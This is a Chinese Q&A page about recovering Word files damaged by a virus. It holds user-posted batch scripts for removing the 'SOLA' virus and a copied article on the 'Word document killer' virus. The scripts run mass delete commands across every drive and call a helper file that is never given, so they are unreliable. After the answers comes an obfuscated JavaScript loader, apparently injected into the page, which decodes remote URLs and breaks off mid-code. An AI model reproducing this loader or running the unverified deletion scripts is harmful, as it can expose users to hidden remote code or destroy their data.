word文档遭病毒破坏,打不开,求高手

2025-02-21 13:10:37
推荐回答(3个)
回答1:

你是中了SOLA病毒,你看一下你的文档是不是已经给改成“EXE”的后缀名。

下面有两段程序哦,要看好,不要只保存成一段程序。

第一个程序:把下面文字保存为一个.bat文件,然后运行即可!

@echo off
set sola=%systemroot%\Fonts
set setup=%systemroot%\Fonts\solasetup
if not exist %sola%\SOLA.BAT set nobd=1&goto QT
color 2f
echo 正在清除WINDOWS系统中的SOLA病毒,请稍候...
del %sola%\SOLA.BAT
rd /s /q %setup%
attrib %systemroot%\Tasks\Tasks.job -s -h -r
del %systemroot%\Tasks\Tasks.job
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
if exist sola.vbs del sola.vbs
echo WINDOWS系统中的SOLA病毒已经清除完毕,按任意键查杀潜藏在其他盘中的SOLA病毒。(如果要同时清理U盘中的病毒请插入U盘。)
goto QT2
:QT
color 2f
echo 您的系统中没有SOLA病毒。按任意键查杀潜藏在其他盘中的SOLA病毒。(如果要同时清理U盘中的病毒请插入U盘。)
:QT2
pause>nul
echo 正在查毒,请稍候...
cls&echo 正在检查磁盘C:&echo 检查结果:&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1&findstr /C:"SOLA_1.0" C:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set C=1&attrib -s -h -r C:\Autorun.inf&del C:\Autorun.inf&del C:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘D:&echo 检查结果:&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1&findstr /C:"SOLA_1.0" D:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set D=1&attrib -s -h -r D:\Autorun.inf&del D:\Autorun.inf&del D:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘E:&echo 检查结果:&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1&findstr /C:"SOLA_1.0" E:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set E=1&attrib -s -h -r E:\Autorun.inf&del E:\Autorun.inf&del E:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘F:&echo 检查结果:&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1&findstr /C:"SOLA_1.0" F:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set F=1&attrib -s -h -r F:\Autorun.inf&del F:\Autorun.inf&del F:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘G:&echo 检查结果:&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1&findstr /C:"SOLA_1.0" G:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set G=1&attrib -s -h -r G:\Autorun.inf&del G:\Autorun.inf&del G:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘H:&echo 检查结果:&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1&findstr /C:"SOLA_1.0" H:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set H=1&attrib -s -h -r H:\Autorun.inf&del H:\Autorun.inf&del H:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘I:&echo 检查结果:&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1&findstr /C:"SOLA_1.0" I:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set I=1&attrib -s -h -r I:\Autorun.inf&del I:\Autorun.inf&del I:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘J:&echo 检查结果:&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1&findstr /C:"SOLA_1.0" J:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set J=1&attrib -s -h -r J:\Autorun.inf&del J:\Autorun.inf&del J:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘K:&echo 检查结果:&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1&findstr /C:"SOLA_1.0" K:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set K=1&attrib -s -h -r K:\Autorun.inf&del K:\Autorun.inf&del K:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘L:&echo 检查结果:&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1&findstr /C:"SOLA_1.0" L:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set L=1&attrib -s -h -r L:\Autorun.inf&del L:\Autorun.inf&del L:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘M:&echo 检查结果:&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1&findstr /C:"SOLA_1.0" M:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set M=1&attrib -s -h -r M:\Autorun.inf&del M:\Autorun.inf&del M:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘N:&echo 检查结果:&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1&findstr /C:"SOLA_1.0" N:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set N=1&attrib -s -h -r N:\Autorun.inf&del N:\Autorun.inf&del N:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘O:&echo 检查结果:&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1&findstr /C:"SOLA_1.0" O:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set O=1&attrib -s -h -r O:\Autorun.inf&del O:\Autorun.inf&del O:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘P:&echo 检查结果:&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1&findstr /C:"SOLA_1.0" P:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set P=1&attrib -s -h -r P:\Autorun.inf&del P:\Autorun.inf&del P:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘Q:&echo 检查结果:&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1&findstr /C:"SOLA_1.0" Q:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set Q=1&attrib -s -h -r Q:\Autorun.inf&del Q:\Autorun.inf&del Q:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘R:&echo 检查结果:&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1&findstr /C:"SOLA_1.0" R:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set R=1&attrib -s -h -r R:\Autorun.inf&del R:\Autorun.inf&del R:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘S:&echo 检查结果:&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1&findstr /C:"SOLA_1.0" S:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set S=1&attrib -s -h -r S:\Autorun.inf&del S:\Autorun.inf&del S:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘T:&echo 检查结果:&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1&findstr /C:"SOLA_1.0" T:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set T=1&attrib -s -h -r T:\Autorun.inf&del T:\Autorun.inf&del T:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘U:&echo 检查结果:&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1&findstr /C:"SOLA_1.0" U:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set U=1&attrib -s -h -r U:\Autorun.inf&del U:\Autorun.inf&del U:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘V:&echo 检查结果:&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1&findstr /C:"SOLA_1.0" V:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set V=1&attrib -s -h -r V:\Autorun.inf&del V:\Autorun.inf&del V:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘W:&echo 检查结果:&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1&findstr /C:"SOLA_1.0" W:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set W=1&attrib -s -h -r W:\Autorun.inf&del W:\Autorun.inf&del W:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘X:&echo 检查结果:&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1&findstr /C:"SOLA_1.0" X:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set X=1&attrib -s -h -r X:\Autorun.inf&del X:\Autorun.inf&del X:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘Y:&echo 检查结果:&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1&findstr /C:"SOLA_1.0" Y:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set Y=1&attrib -s -h -r Y:\Autorun.inf&del Y:\Autorun.inf&del Y:\SOLA\SOLA.BAT
cls&echo 正在检查磁盘Z:&echo 检查结果:&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1&findstr /C:"SOLA_1.0" Z:\Autorun.inf &if not errorlevel 1 echo 发现病毒,正在清除...&set Z=1&attrib -s -h -r Z:\Autorun.inf&del Z:\Autorun.inf&del Z:\SOLA\SOLA.BAT
cls

if exist C:\SOLA rd /s /q C:\SOLA &echo 删除磁盘:C:\SOLA
if exist D:\SOLA rd /s /q D:\SOLA &echo 删除磁盘:D:\SOLA
if exist E:\SOLA rd /s /q E:\SOLA &echo 删除磁盘:E:\SOLA
if exist F:\SOLA rd /s /q F:\SOLA &echo 删除磁盘:F:\SOLA
if exist G:\SOLA rd /s /q G:\SOLA &echo 删除磁盘:G:\SOLA
if exist H:\SOLA rd /s /q H:\SOLA &echo 删除磁盘:H:\SOLA
if exist I:\SOLA rd /s /q I:\SOLA &echo 删除磁盘:I:\SOLA
if exist J:\SOLA rd /s /q J:\SOLA &echo 删除磁盘:J:\SOLA
if exist K:\SOLA rd /s /q K:\SOLA &echo 删除磁盘:K:\SOLA
if exist L:\SOLA rd /s /q L:\SOLA &echo 删除磁盘:L:\SOLA
if exist M:\SOLA rd /s /q M:\SOLA &echo 删除磁盘:M:\SOLA
if exist N:\SOLA rd /s /q N:\SOLA &echo 删除磁盘:N:\SOLA
if exist O:\SOLA rd /s /q O:\SOLA &echo 删除磁盘:O:\SOLA
if exist P:\SOLA rd /s /q P:\SOLA &echo 删除磁盘:P:\SOLA
if exist Q:\SOLA rd /s /q Q:\SOLA &echo 删除磁盘:Q:\SOLA
if exist R:\SOLA rd /s /q R:\SOLA &echo 删除磁盘:R:\SOLA
if exist S:\SOLA rd /s /q S:\SOLA &echo 删除磁盘:S:\SOLA
if exist T:\SOLA rd /s /q T:\SOLA &echo 删除磁盘:T:\SOLA
if exist U:\SOLA rd /s /q U:\SOLA &echo 删除磁盘:U:\SOLA
if exist V:\SOLA rd /s /q V:\SOLA &echo 删除磁盘:V:\SOLA
if exist W:\SOLA rd /s /q W:\SOLA &echo 删除磁盘:W:\SOLA
if exist X:\SOLA rd /s /q X:\SOLA &echo 删除磁盘:X:\SOLA
if exist Y:\SOLA rd /s /q Y:\SOLA &echo 删除磁盘:Y:\SOLA
if exist Z:\SOLA rd /s /q Z:\SOLA &echo 删除磁盘:Z:\SOLA

echo 查杀结果报告:
if "%nobd%"=="1" echo WINDOWS系统中无SOLA病毒,在如下硬盘中找到SOLA病毒并杀除:
if not "%nobd%"=="1" echo WINDOWS系统中发现SOLA病毒,已杀除,并且在如下硬盘中找到SOLA病毒并杀除:
if "%C%"=="1" echo 磁盘:C
if "%D%"=="1" echo 磁盘:D
if "%E%"=="1" echo 磁盘:E
if "%F%"=="1" echo 磁盘:F
if "%G%"=="1" echo 磁盘:G
if "%H%"=="1" echo 磁盘:H
if "%I%"=="1" echo 磁盘:I
if "%J%"=="1" echo 磁盘:J
if "%K%"=="1" echo 磁盘:K
if "%L%"=="1" echo 磁盘:L
if "%M%"=="1" echo 磁盘:M
if "%N%"=="1" echo 磁盘:N
if "%O%"=="1" echo 磁盘:O
if "%P%"=="1" echo 磁盘:P
if "%Q%"=="1" echo 磁盘:Q
if "%R%"=="1" echo 磁盘:R
if "%S%"=="1" echo 磁盘:S
if "%T%"=="1" echo 磁盘:T
if "%U%"=="1" echo 磁盘:U
if "%V%"=="1" echo 磁盘:V
if "%W%"=="1" echo 磁盘:W
if "%X%"=="1" echo 磁盘:X
if "%Y%"=="1" echo 磁盘:Y
if "%Z%"=="1" echo 磁盘:Z

echo 按任意键退出。
pause>nul
:End

第二个程序:上面是杀掉SOLA病毒的编程

再建一个文档,然后把下面的内容再保存为另一个.bat文件,这个是恢复所有“EXE”文档的程序。

@echo off
if not exist %systemroot%\system32\Rar.exe goto ERR2
color 27

for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 0 set %%i=1
if exist %systemroot%\SOLAResult.txt del %systemroot%\SOLAResult.txt
cls
echo ---------正在扫描病毒----------
if exist %systemroot%\SOLAADDRESS.TXT goto SD

if "%C%"=="1" echo 正在获取C盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b C:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%D%"=="1" echo 正在获取D盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b D:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%E%"=="1" echo 正在获取E盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b E:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%F%"=="1" echo 正在获取F盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b F:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%G%"=="1" echo 正在获取G盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b G:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%H%"=="1" echo 正在获取H盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b H:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%I%"=="1" echo 正在获取I盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b I:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%J%"=="1" echo 正在获取J盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b J:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%K%"=="1" echo 正在获取K盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b K:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%L%"=="1" echo 正在获取L盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b L:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%M%"=="1" echo 正在获取M盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b M:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%N%"=="1" echo 正在获取N盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b N:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%O%"=="1" echo 正在获取O盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b O:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%P%"=="1" echo 正在获取P盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b P:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%Q%"=="1" echo 正在获取Q盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b Q:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%R%"=="1" echo 正在获取R盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b R:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%S%"=="1" echo 正在获取S盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b S:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%T%"=="1" echo 正在获取T盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b T:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%U%"=="1" echo 正在获取U盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b U:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%V%"=="1" echo 正在获取V盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b V:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%W%"=="1" echo 正在获取W盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b W:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%X%"=="1" echo 正在获取X盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b X:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%Y%"=="1" echo 正在获取Y盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b Y:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
if "%Z%"=="1" echo 正在获取Z盘的文件目录...&FOR /F "delims=" %%i in ('dir /s /b Z:\*.exe') do call %systemroot%\system32\CMDCheck.bat %%i
goto Result

:SD
FOR /F "delims=" %%i in (%systemroot%\SOLAADDRESS.TXT) do echo 正在获取"%%i"中的文件目录...&FOR /F "delims=" %%j in ('dir /s /b %%i\*.exe') do call %systemroot%\system32\CMDCheck.bat %%j
goto Result

:Result
if not exist %systemroot%\SOLAResult.txt goto ERR1
echo 本次扫描在如下文件中发现病毒并清除
type %systemroot%\SOLAResult.txt
pause>nul
goto End

:Err1
cls
echo 本次扫描未发现病毒。
pause>nul
goto End
:Err2
color 47
echo 找不到RAR.EXE,因此此程序无法正常工作。
Pause>nul
:End

回答2:

这个问题好像能够解决。参考资料如下,自己看看。
http://www.gispark.com/html/life/safe/2006/0709/122.html

回答3:

Word文档杀手病毒处理方法[专杀]
文章来源: 文章作者: 2006-07-09 字体:[大 中 小] 我要投稿! 一、电脑中毒现象
病毒通称为“WORD文档杀手”,病毒主体文件为 c:\windows\doc.exe 或者 c:\windows\doc1.exe ,病毒运行后,搜索硬盘中所有的Word文档并将硬盘里面的所有的word文档建立一个列表,输出到c:\ww.txt文件中,然后逐一将这些word文件删除,在删除的同时还会将这些Word文档复制到c:\windows\wj\ 目录中,并将文件扩展名改为“.com”。同时此病毒还能修改注册表键值,以达到隐藏扩展名的目的。并锁定文件夹查看隐藏文件的选项,不允许显示隐藏文件。在用户看来,所有的word文件就像突然消失了一样。

字串2

二、解决方法及步骤:
1、在查杀病毒网页中下载专杀工具“sysclean”中。
2、重启机器并进入安全模式,同时按下键盘的Ctrl、Alt和Delete按键,打开Windows任务管理器,点击“进程”选项卡,停止“doc.exe”进程。
3、双击sysclean工具,进行扫描杀毒。即可清除病毒。
4、重启机器并进入正常模式,点击下载modreg.rar,解压缩后双击"modreg.reg",点击“是(Y)”修复注册表。
5、进入C:\Windows\wj 文件夹,将后缀名为com 的文件修改为doc后缀,即可找回丢失的word文件。

字串7

三、注意事项提醒:
1、用U盘拷贝数据的时候,请锁定自己的U盘,以防止别人的机器的病毒侵入自己的U盘。一旦U盘或移动硬盘已经感染病毒,请务必先杀毒后再使用。
2、各用户的计算机若没有安装防病毒软件的,请及时安装防病毒软件。在处理病毒的过程中,发现中毒的机器基本上都是没有安装任何防病毒软件,或者是安装了无法自动更新的防病毒软件。
3、收到陌生的、可疑的邮件,请不要随便打开。因为现在很多病毒都是通过邮件传播。

字串8

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 